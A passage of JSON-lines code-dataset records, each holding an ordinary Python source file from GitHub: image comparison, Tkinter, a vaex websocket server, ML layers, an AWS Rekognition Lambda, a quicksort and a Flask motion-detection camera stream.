self.height, self.max_pixel_dst)\n >= self.limit\n )\n\n\ndef compare_images_native(\n imp: AbstractImageProvider, output: Dict[Any, Sequence[Any]]\n) -> List[Set[Any]]:\n nb_images = imp.count()\n native_sequences = {}\n native_sequence_pointers = {}\n with tqdm(total=nb_images, desc=\"Generate numpy miniatures\") as pbar:\n for identifier, image in imp.items():\n sequence = image_to_native(image.resize(THUMBNAIL_SIZE))\n native_sequences[identifier] = sequence\n native_sequence_pointers[identifier] = pointer(sequence)\n pbar.update(1)\n assert len(native_sequences) == nb_images\n\n graph = Graph()\n nb_todo = sum(len(d) for d in output.values())\n sim_cmp = CppSimilarityComparator(\n SIM_LIMIT, THUMBNAIL_DIMENSION, THUMBNAIL_DIMENSION\n )\n with tqdm(total=nb_todo, desc=\"Make real comparisons\") as bar:\n for filename, linked_filenames in output.items():\n p1 = native_sequence_pointers[filename]\n for linked_filename in linked_filenames:\n p2 = native_sequence_pointers[linked_filename]\n if sim_cmp.are_similar(p1, p2):\n graph.connect(filename, linked_filename)\n bar.update(1)\n\n groups = [group for group in graph.pop_groups() if len(group) > 1]\n return groups\n","repo_name":"notoraptor/similiraptor","sub_path":"imgsimsearch/native_fine_comparator.py","file_name":"native_fine_comparator.py","file_ext":"py","file_size_in_byte":2834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38607647928","text":"import tkinter as tk\n\nclass My_gui:\n def __init__(self):\n self.root = tk.Tk()\n self.root.geometry(\"500x500\")\n self.root.title(\"MessageBox\")\n\n # self.label1 = tk.Label(self.root, text='Hi!', font=('Arial', 20), fg=\"white\", bg=\"black\", height=5, width=5)\n # self.label1.pack() \n\n # self.test_btn = tk.Button(self.root, text=\"test button\", height=5, width=10)\n # self.test_btn.pack()\n\n self.test_textbox = tk.Text(self.root, height=5, font=(\"Arial\", 20))\n self.test_textbox.pack()\n\n self.checkVal = tk.IntVar()\n self.checkbox = tk.Checkbutton(self.root, text=\"Show Messagebox\", font=(\"Arial\", 20), variable=self.checkVal)\n self.checkbox.pack()\n\n self.messageBtn = tk.Button(self.root, text=\"Show Message\", command=self.message, font=(\"Arial\", 20))\n self.messageBtn.pack()\n\n self.root.mainloop()\n \n def message(self):\n if 
self.checkVal.get() == 1:\n print(self.test_textbox.get(\"1.0\", tk.END))\n else:\n print(\"Message\")\n\nMy_gui()\n","repo_name":"AaronYin5758/Tkinter","sub_path":"message_box.py","file_name":"message_box.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17078181822","text":"import asyncio\nimport logging\n\nimport vaex\nimport vaex.asyncio\nimport vaex.core._version\nimport vaex.server._version\nimport vaex.server.dataframe\n\nfrom vaex.encoding import serialize, deserialize, Encoding\nfrom .utils import exception\n\n\nTEST_LATENCY = 0\nlogger = logging.getLogger(\"vaex.webserver.websocket\")\n\n\nclass WebSocketHandler:\n def __init__(self, send, service, token=None, token_trusted=None):\n self.send = send\n self.service = service\n self.token = token\n self.token_trusted = token_trusted\n self.trusted = False\n self._msg_id_to_tasks = {}\n self.tasks = []\n\n async def handle_message(self, websocket_msg):\n try:\n await self._handle_message(websocket_msg)\n except BaseException as e:\n encoding = Encoding()\n websocket_msg = deserialize(websocket_msg, encoding)\n msg_id = websocket_msg['msg_id']\n msg = exception(e)\n await self.write_json({'msg_id': msg_id, 'msg': msg})\n logger.exception(\"unhandled exception\")\n\n async def _handle_message(self, websocket_msg):\n if TEST_LATENCY:\n await asyncio.sleep(TEST_LATENCY)\n msg_id = 'invalid'\n encoding = Encoding()\n try:\n websocket_msg = deserialize(websocket_msg, encoding)\n logger.debug(\"websocket message: %s\", websocket_msg)\n msg_id, msg, auth = websocket_msg['msg_id'], websocket_msg['msg'], websocket_msg['auth']\n\n token = auth['token'] # are we even allowed to execute?\n token_trusted = auth['token-trusted'] # do we trust arbitrary code execution?\n trusted = token_trusted == self.token_trusted and token_trusted\n\n if not ((token == self.token) or\n (self.token_trusted and token_trusted == self.token_trusted)):\n raise ValueError('No token provided, not authorized')\n\n last_progress = None\n ioloop = asyncio.get_event_loop()\n progress_futures = []\n\n def progress(f):\n nonlocal last_progress\n\n async def send_progress():\n vaex.asyncio.check_patch_tornado() # during testing asyncio might be patched\n nonlocal last_progress\n logger.debug(\"progress: %r\", f)\n last_progress = f\n # TODO: create task?\n return await self.write_json({'msg_id': msg_id, 'msg': {'progress': f}})\n # emit when it's the first time (None), at least 0.05 sec lasted, or and the end\n # but never send old or same values\n if (last_progress is None or (f - last_progress) > 0.05 or f == 1.0) and (last_progress is None or f > last_progress):\n def wrapper():\n # see https://docs.python.org/3/library/asyncio-task.html#asyncio.create_task\n # TODO: replace after we drop 36 support progress_futures.append(asyncio.create_task(send_progress()))\n progress_futures.append(asyncio.ensure_future(send_progress()))\n ioloop.call_soon_threadsafe(wrapper)\n return True\n\n command = msg['command']\n if command == 'list':\n result = self.service.list()\n await self.write_json({'msg_id': msg_id, 'msg': {'result': result}})\n elif command == 'versions':\n result = {'vaex.core': vaex.core._version.__version_tuple__, 'vaex.server': vaex.server._version.__version_tuple__}\n await self.write_json({'msg_id': msg_id, 'msg': {'result': result}})\n elif command == 'execute':\n df = self.service[msg['df']].copy()\n df.state_set(msg['state'], use_active_range=True, 
trusted=trusted)\n tasks = encoding.decode_list('task', msg['tasks'], df=df)\n self._msg_id_to_tasks[msg_id] = tasks # keep a reference for cancelling\n try:\n # TODO: this assumes all tasks succeed, but we also support 1 failing\n results = await self.service.execute(df, tasks, progress=progress)\n finally:\n del self._msg_id_to_tasks[msg_id]\n await asyncio.gather(*progress_futures)\n # make sure the final progress value is send, and also old values are not send\n last_progress = 1.0\n await self.write_json({'msg_id': msg_id, 'msg': {'progress': 1.0}})\n encoding = Encoding()\n results = encoding.encode_list('vaex-task-result', results)\n await self.write_json({'msg_id': msg_id, 'msg': {'result': results}}, encoding)\n elif command == 'cancel':\n try:\n tasks = self._msg_id_to_tasks[msg['cancel_msg_id']]\n except KeyError:\n pass # already done, or cancelled\n else:\n for task in tasks:\n task.cancel()\n elif command == 'call-dataframe':\n df = self.service[msg['df']].copy()\n df.state_set(msg['state'], use_active_range=True, trusted=trusted)\n # TODO: yield\n if msg['method'] not in vaex.server.dataframe.allowed_method_names:\n raise NotImplementedError(\"Method is not rmi invokable\")\n results = self.service._rmi(df, msg['method'], msg['args'], msg['kwargs'])\n encoding = Encoding()\n if msg['method'] == \"_evaluate_implementation\":\n results = encoding.encode('vaex-evaluate-result', results)\n else:\n results = encoding.encode('vaex-rmi-result', results)\n await self.write_json({'msg_id': msg_id, 'msg': {'result': results}}, encoding)\n else:\n raise ValueError(f'Unknown command: {command}')\n\n except Exception as e:\n logger.exception(\"Exception while handling msg\")\n msg = exception(e)\n await self.write_json({'msg_id': msg_id, 'msg': msg})\n\n async def write_json(self, msg, encoding=None):\n encoding = encoding or Encoding()\n logger.debug(\"writing json: %r\", msg)\n try:\n return await self.send(serialize(msg, encoding))\n except: # noqa\n logger.exception('Failed to write: %s', msg)\n\n def on_close(self):\n logger.debug(\"WebSocket closed\")\n","repo_name":"vaexio/vaex","sub_path":"packages/vaex-server/vaex/server/websocket.py","file_name":"websocket.py","file_ext":"py","file_size_in_byte":6582,"program_lang":"python","lang":"en","doc_type":"code","stars":8057,"dataset":"github-code","pt":"53"} +{"seq_id":"41031437458","text":"import numpy as np\nimport torch\nfrom poutyne import Model\nfrom torch.nn import functional as F\n\nclass Fusion_network(torch.nn.Module):\n\n def __init__(self, models, n_actions, in_dim, out_dim, n_hidden_layers=3, hidden_dim=64):\n self.models = models\n self.n_models = len(models)\n self.n_actions = n_actions\n self.memory_size=1\n super().__init__()\n layers = [torch.nn.Linear(in_dim+self.n_models*self.n_actions, hidden_dim), torch.nn.ReLU()]\n #layers = [torch.nn.Linear(in_dim, hidden_dim), torch.nn.ReLU()]\n for _ in range(n_hidden_layers - 1):\n layers.extend([torch.nn.Linear(hidden_dim, hidden_dim), torch.nn.ReLU()])\n layers.append(torch.nn.Linear(hidden_dim, out_dim))\n #layers.append(torch.nn.Softmax())\n\n self.fa = torch.nn.Sequential(*layers)\n\n def get_actions(self, state):\n batch_size = state.shape[0]\n pred_actions = np.zeros((batch_size, self.n_models, self.n_actions))\n for i in range(self.n_models):\n a = self.models[i].predict(state[:, -self.models[i].network.memory_size:])\n\n\n #print(a.shape)\n pred_actions[:,i] = a\n pred_actions = pred_actions#/np.linalg.norm(pred_actions, axis=-1)[:,:,np.newaxis]\n return pred_actions 
\n \n def format_states_actions(self, state, pred_actions):\n #print(state[:,-1].shape, pred_actions.reshape((pred_actions.shape[0],-1)).shape)\n #print(np.concatenate((pred_actions.reshape((pred_actions.shape[0],-1)), state[:,-1]), axis=-1).shape)\n return torch.cat((pred_actions.reshape((pred_actions.shape[0],-1)), state[:,-1]), dim=-1)\n \n def forward(self, state, return_weights=False):\n pred_actions = torch.from_numpy(self.get_actions(state))\n \n state_preds = self.format_states_actions(state, pred_actions)\n attn = self.fa(state_preds.float())#state.float()[:,-1])\n attn = torch.nn.functional.softmax(attn/1000, dim=-1)\n weighted_sum = torch.sum(attn.unsqueeze(-1)*pred_actions, axis=1)\n #print(attn[0])\n self.last_preds = weighted_sum\n self.last_attn = attn\n return weighted_sum\n \nclass Attention_ensemble(Model):\n def __init__(self, actions, models, weight_models=False, normalize_preds = False, *args, **kwargs):\n self.actions = actions\n self.models = models\n self.n_models = len(self.models)\n self.n_actions = len(self.actions)\n self.normalize_preds = normalize_preds\n self.weight_models = weight_models\n\n super().__init__(*args, **kwargs)\n def get_action(self, state, epsilon = 0, return_values = False):\n #print(state.shape)\n if np.random.random() < epsilon:\n return np.random.choice(self.actions)\n \n else:\n actions = self.predict(state[np.newaxis])\n return np.argmax(actions)\n\n def format_states_actions(self, state, pred_actions):\n return np.concatenate((pred_actions.reshape((pred_actions.shape[0],-1)), state[:,-1]), axis=-1)\n\n def soft_update(self, other, tau):\n \"\"\"\n Code for the soft update between a target network (self) and\n a source network (other).\n\n The weights are updated according to the rule in the assignment.\n \"\"\"\n new_weights = {}\n\n own_weights = self.get_weight_copies()\n other_weights = other.get_weight_copies()\n\n for k in own_weights:\n #print(own_weights[k].shape, other_weights[k].shape)\n new_weights[k] = (1 - tau) * own_weights[k] + tau * other_weights[k]\n self.set_weights(new_weights)","repo_name":"JeremieGince/Mixture_models_Deep_RL","sub_path":"Ensemble/attn_ensemble.py","file_name":"attn_ensemble.py","file_ext":"py","file_size_in_byte":3657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24232053945","text":"def order(arr1):\n if len(arr1)<2:\n return arr1\n mid=arr1[len(arr1)//2]\n left=[]\n right=[]\n arr1.remove(mid)\n for i in arr1:\n if i <=mid:\n left.append(i)\n else:\n right.append(i)\n return order(left)+[mid]+order(right)\n\nprint(order([11, 99, 33, 69, 77, 88, 55, 11, 33, 36, 39, 66, 44, 22]))","repo_name":"liucheng2912/py","sub_path":"kc/ui/qs1.py","file_name":"qs1.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38032485580","text":"import json\r\nimport boto3\r\nimport base64\r\nimport io\r\nimport cv2\r\nimport numpy as np\r\nfrom PIL import Image\r\n\r\ndef lambda_handler(event, context):\r\n rekognition = boto3.client('rekognition', region_name='ap-northeast-1')\r\n mqttmessage = boto3.client('iot-data', region_name='ap-northeast-1')\r\n dynamodb = boto3.resource('dynamodb')\r\n table = dynamodb.Table('escaperoom-ImageTable8000B8A1-6LFZ1GJM4KI9')\r\n data = event['base64_image'] \r\n base64_decoded = base64.b64decode(data)\r\n image = Image.open(io.BytesIO(base64_decoded))\r\n opencv_img= cv2.cvtColor(np.array(image), 
cv2.COLOR_BGR2RGB)\r\n\r\n text_image = Image.fromarray(opencv_img)\r\n text_bytes_arr = io.BytesIO()\r\n text_image.save(text_bytes_arr, format='JPEG')\r\n text_bytes = text_bytes_arr.getvalue()\r\n response = rekognition.recognize_celebrities(\r\n Image={'Bytes':text_bytes})\r\n print('procesing image ....')\r\n if response['CelebrityFaces']:\r\n if response['CelebrityFaces'][0]['Name'] == \"Werner Vogels\":\r\n status = \"OK - Authorized Personnel Detected\"\r\n responsemqtt = mqttmessage.publish( topic='$aws/things/escaperoom/celebrityrekognition/status', qos=1, payload=json.dumps({\"status\":status}) )\r\n cv2.putText(opencv_img, status, (10, 50), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (0, 255, 0), 3)\r\n retval, buffer = cv2.imencode('.jpg', cv2.resize(opencv_img, (1280, 736)))\r\n base64_image = str(base64.b64encode(buffer))\r\n base64_image = base64_image[:-1]\r\n base64_image = base64_image[2:]\r\n table.update_item(Key={\"key\": \"cameraImage\",},UpdateExpression=\"set image = :g\",ExpressionAttributeValues={':g': json.dumps(base64_image)},ReturnValues=\"UPDATED_NEW\") \r\n return status\r\n else:\r\n status = \"ERROR - No Authorized Personnel Detected\"\r\n responsemqtt = mqttmessage.publish( topic='$aws/things/escaperoom/celebrityrekognition/status', qos=1, payload=json.dumps({\"status\":status}) )\r\n cv2.putText(opencv_img, status, (10, 50), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (0, 0, 255), 3)\r\n retval, buffer = cv2.imencode('.jpg', cv2.resize(opencv_img, (1280, 736)))\r\n base64_image = str(base64.b64encode(buffer))\r\n base64_image = base64_image[:-1]\r\n base64_image = base64_image[2:]\r\n table.update_item(Key={\"key\": \"cameraImage\",},UpdateExpression=\"set image = :g\",ExpressionAttributeValues={':g': json.dumps(base64_image)},ReturnValues=\"UPDATED_NEW\")\r\n print('NO Authorized person update new environment ')\r\n return status\r\n \r\n \r\n\r\n \r\n\r\n","repo_name":"wahaiya/EscapeRoom-GreenGrass","sub_path":"lambda/escaperoom-celebrity-rekognition-process/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":2611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5522738106","text":"import torch\nfrom tqdm import tqdm\n\nfrom constants import ModesSGP\nfrom lib_task.common import compute_expected_p_vec\n\n\ndef concat_params_and_weights(param_cat, weights, n_nodes):\n param_opt_nodes = torch.reshape(param_cat, (n_nodes, -1))\n return torch.cat((param_opt_nodes, torch.reshape(weights, (-1, 1))), dim=1).reshape(-1)\n\n\ndef split_params_and_weights(param_weight_cat, n_nodes):\n param_weight_nodes = torch.reshape(param_weight_cat, (n_nodes, -1))\n weights = param_weight_nodes[:, -1]\n params_biased = param_weight_nodes[:, :-1]\n return torch.flatten(params_biased), weights\n\n\ndef kron_matrix_vector_prod(v, A, B=None):\n # kron(A, B) @ v = vec(B @ vec^-1(v) @ A.T)\n # V = vec^-1(v)\n # V is transposed between numpy implementation and math in the paper\n V = torch.reshape(v, (A.shape[1], -1))\n if B is None: # B is assumed to be identity matrix\n return torch.flatten(A @ V)\n else:\n raise NotImplementedError\n\n\ndef kron_diag_matrix_vector_prod(v, u):\n # kron(diag(u), I) @ v = vec(vec^-1(v) * u)\n # V = vec^-1(v)\n V = torch.reshape(v, (u.shape[0], -1))\n return torch.flatten((V.T.contiguous() * u).T.contiguous())\n\n\ndef compute_expected_p_mat(graph, models):\n # sample edges\n p_vecs = []\n for idx_from, model in tqdm(enumerate(models)):\n p_vec = compute_expected_p_vec(model, 
graph)\n p_vecs.append(p_vec)\n return torch.vstack(p_vecs).T.contiguous()\n\ndef get_current_p_mat(graph, models):\n # sample edges\n p_vecs = []\n for idx_from, model in enumerate(models):\n are_connected = graph.are_connected(idx_from)\n p_vec = model.get_p_vec(are_connected)\n p_vecs.append(p_vec)\n return torch.vstack(p_vecs).T.contiguous()\n\ndef compute_loss_sum(clients, inputs_nodes, idxs_sample_nodes=None, to_node=None, train_logger=None):\n loss_sum = 0.\n for client, inputs, idxs_sample in zip(clients, inputs_nodes, idxs_sample_nodes):\n kwargs_loss = client.get_kwargs_loss(inputs, idxs_sample)\n loss = client.model.loss(inputs, **kwargs_loss)\n loss_sum += loss\n if train_logger is not None:\n train_logger.record_step_value(client.gossip.idx_node, 'loss', loss.item())\n\n return loss_sum\n\n\ndef update_param_cat_biased(clients, param_cat_biased, param_cat_debiased, inputs_nodes, idxs_sample_nodes, P, lr_cat, create_graph, mode_sgp, train_logger=None):\n if train_logger is not None:\n for idx_node, lr in enumerate(lr_cat):\n train_logger.record_step_value(idx_node, 'lr', lr.item())\n\n loss_sum = compute_loss_sum(clients, inputs_nodes, idxs_sample_nodes=idxs_sample_nodes, train_logger=train_logger)\n # param update\n grad = torch.autograd.grad(loss_sum, param_cat_debiased, create_graph=create_graph)[0]\n if mode_sgp == ModesSGP.ASSRAN:\n # x = P (x - A * g (z, lambda))\n param_cat_biased_updated = kron_matrix_vector_prod(param_cat_biased - kron_diag_matrix_vector_prod(grad, lr_cat), P)\n elif mode_sgp == ModesSGP.NEDIC:\n # x = P x - A * g (z, lambda)\n param_cat_biased_updated = kron_matrix_vector_prod(param_cat_biased, P) - kron_diag_matrix_vector_prod(grad, lr_cat)\n else:\n raise ValueError(mode_sgp)\n\n return param_cat_biased_updated\n","repo_name":"hitachi-rd-cv/pdbo-hgp","sub_path":"lib_task/concat_hgp.py","file_name":"concat_hgp.py","file_ext":"py","file_size_in_byte":3271,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"37576019522","text":"import pycuda.driver as cuda\nfrom pycuda.compiler import SourceModule\nimport os\nimport numpy as np\nimport pycuda.compiler as nvcc\nimport pycuda.compiler as nvcc\nimport pycuda.gpuarray as gpu\nimport pycuda.driver as cu\nimport pycuda.autoinit\n\n_path = r'E:\\Microsoft Visual Studio\\2019\\Community\\VC\\Tools\\MSVC\\14.29.30133\\bin\\Hostx64\\x64'\nif os.system(\"cl.exe\"):\n os.environ['PATH'] += ';' + _path\nif os.system(\"cl.exe\"):\n raise RuntimeError(\"cl.exe still not found, path probably incorrect\")\n\nmod = SourceModule(\"\"\"\n__global__ void doublify(float *a)\n{\nint idx = threadIdx.x + threadIdx.y*4;\na[idx] *= 2;\n}\n\"\"\")\n\na = np.random.randn(16, 16)\na = a.astype(np.float32)\na_gpu = cuda.mem_alloc(a.nbytes) # 在GPU上为a分配所需的显存\ncuda.memcpy_htod(a_gpu, a) # 将数据转移到 GPU\n\nfunc = mod.get_function(\"doublify\")\nfunc(a_gpu, block=(16, 16, 1))\n\na_doubled = np.empty_like(a)\ncuda.memcpy_dtoh(a_doubled, a_gpu)\nprint(a_doubled)\nprint(a)\n","repo_name":"PangHaowen-hub/segment_registration","sub_path":"test_pycuda.py","file_name":"test_pycuda.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2597026852","text":"from PyQt5 import QtGui, QtWidgets\n\nfrom ui import Ui_QMainWindow\n\n\nclass MainDialog(QtWidgets.QDialog):\n\n def __init__(self):\n\n QtWidgets.QDialog.__init__(self)\n self.ui = Ui_QMainWindow()\n self.ui.setupUi(self)\n logo = 
QtGui.QImage(\"image/nculogo.jpg\")\n logo = logo.scaled(200,200)\n self.ui.label.setPixmap(QtGui.QPixmap(logo))\n self.ui.label.resize(300,300)\n self.ui.pushButton_2.clicked.connect(self.PushButtonClicked2)\n\n def PushButton1Clicked(self):\n box = QtWidgets.QMessageBox()\n box.warning(self, \"提示\", \"这是一个按钮事件\")\n\n\n\n def PushButtonClicked2(self):\n from detect import main\n main()\n\n\nimport sys\nif __name__=='__main__':\n app=QtWidgets.QApplication(sys.argv)\n Form=MainDialog()\n Form.show()\n Form.ui.pushButton.clicked.connect(Form.PushButtonClicked2)\n sys.exit(app.exec_())","repo_name":"YingkaiFu/Object_Detection_Tensorflow","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"12645597130","text":"import json\nimport boto3\nimport os\n\ndynamodb = boto3.client('dynamodb')\n\ndef handle(event, context):\n \n uid = event['requestContext']['connectionId']\n message = json.loads(event['body'])['message']\n \n paginator = dynamodb.get_paginator('scan')\n connectionIds = []\n\n apigatewaymanagementapi = boto3.client('apigatewaymanagementapi', \n endpoint_url = \"https://\" + event[\"requestContext\"][\"domainName\"] + \"/\" + event[\"requestContext\"][\"stage\"])\n for page in paginator.paginate(TableName=os.environ['SOCKET_CONNECTIONS_TABLE_NAME']):\n connectionIds.extend(page['Items'])\n\n response = {\n 'action': 'onMessage',\n 'message': {\n 'message-type': 'chat',\n 'yourself': False,\n 'message': message\n }\n }\n # Emit the recieved message to all the connected devices\n for connectionId in connectionIds:\n if connectionId['name']['S']:\n response['message']['yourself'] = True if uid == connectionId['connectionId']['S'] else False\n apigatewaymanagementapi.post_to_connection(\n Data=json.dumps(response),\n ConnectionId=connectionId['connectionId']['S']\n )\n\n return {}","repo_name":"edwardhorsey/serverless-chat-app","sub_path":"websocket/on_message_handler.py","file_name":"on_message_handler.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75249486568","text":"import tensorflow as tf\nimport numpy as np\n\n\ndef conv_relu_layer(ftmps, hparams, weights, name, init_weights):\n kernel_val, bias_val = init_weights[name]\n kernel_initializer = tf.constant_initializer(kernel_val)\n bias_initializer = tf.constant_initializer(bias_val)\n\n with tf.variable_scope(name):\n kernel = tf.get_variable(\"kernel\",\n shape=kernel_val.shape,\n initializer=kernel_initializer,\n regularizer=_regularizer(hparams))\n bias = tf.get_variable(\"bias\",\n shape=bias_val.shape,\n initializer=bias_initializer)\n weights[name] = kernel, bias\n\n conv = tf.nn.conv2d(ftmps, kernel, (1, 1, 1, 1), \"SAME\", name=\"conv\")\n relu = tf.nn.relu(conv + bias, name=\"relu\")\n\n return relu\n\n\ndef fc2conv_layer(\n ftmps, hparams, weights, use_dropout, name, new_shape, init_weights):\n kernel_val, bias_val = init_weights[name]\n kernel_val = kernel_val.reshape(new_shape)\n kernel_initializer = tf.constant_initializer(kernel_val)\n bias_initializer = tf.constant_initializer(bias_val)\n\n with tf.variable_scope(name):\n kernel = tf.get_variable(\"kernel\",\n shape=kernel_val.shape,\n initializer=kernel_initializer,\n regularizer=_regularizer(hparams))\n bias = tf.get_variable(\"bias\",\n shape=bias_val.shape,\n initializer=bias_initializer)\n weights[name] = kernel, 
bias\n\n conv = tf.nn.conv2d(ftmps, kernel, (1, 1, 1, 1), \"SAME\", name=\"conv\")\n relu = tf.nn.relu(conv + bias, name=\"relu\")\n\n if use_dropout:\n return tf.nn.dropout(relu, hparams.keep_prob, name=\"dropout\")\n else:\n return relu\n\n\ndef project_layer(ftmps, hparams, weights, out_depth, name, init_weights):\n in_depth = ftmps.get_shape().as_list()[3]\n\n if name in init_weights:\n kernel_val, bias_val = init_weights[name]\n kernel_initializer = tf.constant_initializer(kernel_val)\n bias_initializer = tf.constant_initializer(bias_val)\n else:\n kernel_initializer = tf.zeros_initializer()\n bias_initializer = tf.zeros_initializer()\n\n with tf.variable_scope(name):\n kernel = tf.get_variable(\"kernel\",\n shape=(1, 1, in_depth, out_depth),\n initializer=kernel_initializer,\n regularizer=_regularizer(hparams))\n bias = tf.get_variable(\"bias\",\n shape=(out_depth,),\n initializer=bias_initializer)\n weights[name] = kernel, bias\n\n conv = tf.nn.conv2d(ftmps, kernel, (1, 1, 1, 1), \"SAME\", name=\"conv\")\n return conv + bias\n\n\ndef upsample_layer(ftmps,\n hparams, weights, upsample_factor, output_shape, name, init_weights):\n\n if name in init_weights:\n kernel_val = init_weights[name][0]\n kernel_initializer = tf.constant_initializer(kernel_val)\n else:\n depth = ftmps.get_shape().as_list()[3]\n kernel_val = _get_bilinear_weights(upsample_factor, depth)\n kernel_initializer = tf.constant_initializer(kernel_val)\n\n strides = 1, upsample_factor, upsample_factor, 1\n\n with tf.variable_scope(name):\n kernel = tf.get_variable(\"kernel\",\n shape=kernel_val.shape,\n initializer=kernel_initializer,\n trainable=hparams.train_upsample_weights)\n weights[name] = (kernel,)\n\n conv_transposed = tf.nn.conv2d_transpose(ftmps,\n filter=kernel,\n output_shape=output_shape,\n strides=strides,\n padding=\"SAME\",\n name=name)\n return conv_transposed\n\n\ndef _get_bilinear_weights(upsample_factor, num_classes):\n\n kernel_size = upsample_factor * 2 - upsample_factor % 2\n weights_val = np.zeros((kernel_size, kernel_size, num_classes, num_classes),\n dtype=np.float32)\n\n factor = (kernel_size + 1) // 2\n if kernel_size % 2 == 1:\n center = factor - 1\n else:\n center = factor - 0.5\n\n og = np.ogrid[:kernel_size, :kernel_size]\n\n kernel_val = ((1 - abs(og[0] - center) / factor) *\n (1 - abs(og[1] - center) / factor))\n\n for i in range(num_classes):\n weights_val[:, :, i, i] = kernel_val\n\n return weights_val\n\n\ndef _regularizer(hparams):\n return tf.contrib.layers.l2_regularizer(scale=hparams.weight_decay)\n","repo_name":"chao-ji/tf-fcn8s","sub_path":"pascal/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":4550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27819914073","text":"kaas = input(\"is de kaas geel?\")\nif kaas == \"yes\":\n wat = input(\"zitten er gaten in?\")\n if wat == \"yes\":\n wat = input(\"is de kaas belachelijk duur?\")\n if wat == \"yes\":\n print(\"emmenthaler\")\n elif wat == \"no \":\n print(\"leerdammer\")\n elif wat == \"no\":\n wat = input(\" is de kaas hard als steen?\")\n if wat == \"yes\":\n print(\"pamnigiano reggiano\")\n elif wat == \"no\":\n print (\"goudse kaas\")\nelif kaas == \"no\":\n kaas = input(\"heeft fr kaas blaouwe shimmels?\")\n if kaas == \"yes\":\n kaas = input(\"heeft de kaas een korst?\")\n if kaas == \"yes\":\n print(\"bleu de rochbaron\")\n elif kaas == \"no\":\n kaas = input(\"heeft de kaas een korst\")\n if kaas == \"yes\":\n print(\" camembert\")\n elif 
kaas == \"no\":\n print(\"Mozzarella\")\nelse:\n print(\"u have to (say yes or no) \")\n \n \n\n\n\n\n\n\n\n \n \n\n\n","repo_name":"ObaidaKurea/werken-met-condities","sub_path":"kaas .py","file_name":"kaas .py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"nl","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7848799886","text":"from flask.templating import render_template\nfrom imutils.video import VideoStream\nfrom flask_socketio import SocketIO\nfrom time import time, sleep\nfrom flask import Response\nfrom flask import Flask\nimport threading\nimport argparse\nimport imutils\nimport dotenv\nimport cv2\n\nWIDTH = 640\nHEIGHT = 480\nRS_WIDTH = int(WIDTH / 1.6)\nRS_HEIGHT = int(HEIGHT / 1.6)\n\n# Init output and thread lock\noutput_frame = None\nlock = threading.Lock()\n\n# Init app and camera\napp = Flask(__name__)\nsocketio = SocketIO(app, cors_allowed_origins=\"*\")\nvs = VideoStream(src=0).start()\n\n# Motion alert emit limit\nemit_limit = 30\n\nclass MotionDetector:\n def __init__(self, accumWeight=0.5) -> None:\n self.accumWeight = accumWeight\n self.bg = None\n\n def update(self, image):\n if self.bg is None:\n self.bg = image.copy().astype(\"float\")\n return\n cv2.accumulateWeighted(image, self.bg, self.accumWeight)\n \n def detect(self, image, t_val=25):\n # Get diff between bg and image per threshold\n delta = cv2.absdiff(self.bg.astype(\"uint8\"), image)\n threshold = cv2.threshold(delta, t_val, 255, cv2.THRESH_BINARY)[1]\n\n # Distort image to eradicate false positives\n threshold = cv2.erode(threshold, None, iterations=1)\n threshold = cv2.dilate(threshold, None, iterations=1)\n\n # Contours of motion\n contours = cv2.findContours(threshold, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[0]\n\n return len(contours) > 0\n\ndef detect_motion(frame_count):\n global output_frame, lock\n md = MotionDetector(0.5)\n \n next_emit = time() + emit_limit\n\n # Construct bg\n for _ in range(frame_count):\n with lock:\n frame = output_frame.copy()\n gray = imutils.resize(frame, width=RS_WIDTH, height=RS_HEIGHT)\n gray = cv2.cvtColor(gray, cv2.COLOR_BGR2GRAY)\n gray = cv2.GaussianBlur(gray, (7, 7), 0)\n md.update(gray)\n\n # Run MotionDetector once every second (unless fn takes longer)\n while True:\n start = time()\n with lock:\n frame = output_frame.copy()\n gray = imutils.resize(frame, width=RS_WIDTH, height=RS_HEIGHT)\n gray = cv2.cvtColor(gray, cv2.COLOR_BGR2GRAY)\n gray = cv2.GaussianBlur(gray, (7, 7), 0)\n\n motion = md.detect(gray)\n md.update(gray)\n\n ts = time()\n if motion and ts > next_emit:\n socketio.emit(\"motion\")\n next_emit = ts + emit_limit\n\n sleep(max(0, 1 - (ts - start)))\n\ndef get_frame():\n global vs, output_frame, lock\n while True:\n ts = time()\n with lock:\n output_frame = vs.read()\n\n # Max 25 FPS\n sleep(max(0, 0.04 - (time() - ts)))\n\ndef generate():\n global output_frame, lock\n params = [cv2.IMWRITE_JPEG_QUALITY, 80]\n while True:\n with lock:\n if output_frame is None:\n continue\n \n success, encoded_img = cv2.imencode(\".jpg\", output_frame, params)\n if not success:\n continue\n \n yield(b\"--frame\\r\\n\" b\"Content-Type: image/jpeg\\r\\n\\r\\n\" + bytearray(encoded_img) + b\"\\r\\n\")\n\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\")\n\n@app.route(\"/video_feed\")\ndef video_feed():\n return Response(generate(), mimetype=\"multipart/x-mixed-replace; 